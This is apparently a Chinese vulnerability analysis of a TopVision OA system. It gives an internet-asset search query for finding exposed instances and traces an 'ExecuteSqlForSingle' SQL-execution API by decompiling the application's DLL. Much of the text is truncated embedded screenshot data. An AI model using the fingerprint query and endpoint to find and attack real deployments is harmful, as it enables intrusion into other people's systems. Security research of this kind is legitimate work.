<p blockindex=5><img src="data:image/png;base64,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
<p blockindex=6>hunter:</p>
<pre blockindex=7><code class="hljs language-js">web.body=<span class=hljs-string>"topvision_oaName"</span>
</code></pre>
<p blockindex=8><img src="data:image/png;base64,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
<h2 blockindex=9>三、漏洞分析</h2>
<p blockindex=10>1、使用文件搜索工具在项目内搜索关键字ExecuteSqlForSingle<br>
<img src=data:image/png;base64,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
<p blockindex=11>2、搜出来\manager\bin\TopVision.WebApi.XML 文件中，存在两处接口</p>
<pre blockindex=12><code class="hljs language-js">M:TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle(System.String,System.String,System.String)
<span class=hljs-attr>M</span>:TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle(System.String,System.String,System.String)
</code></pre>
<p blockindex=13>3、使用dnSpy工具反编译\manager\bin\TopVision.WebApi.dll</p>
<p blockindex=14><img src="data:image/png;base64,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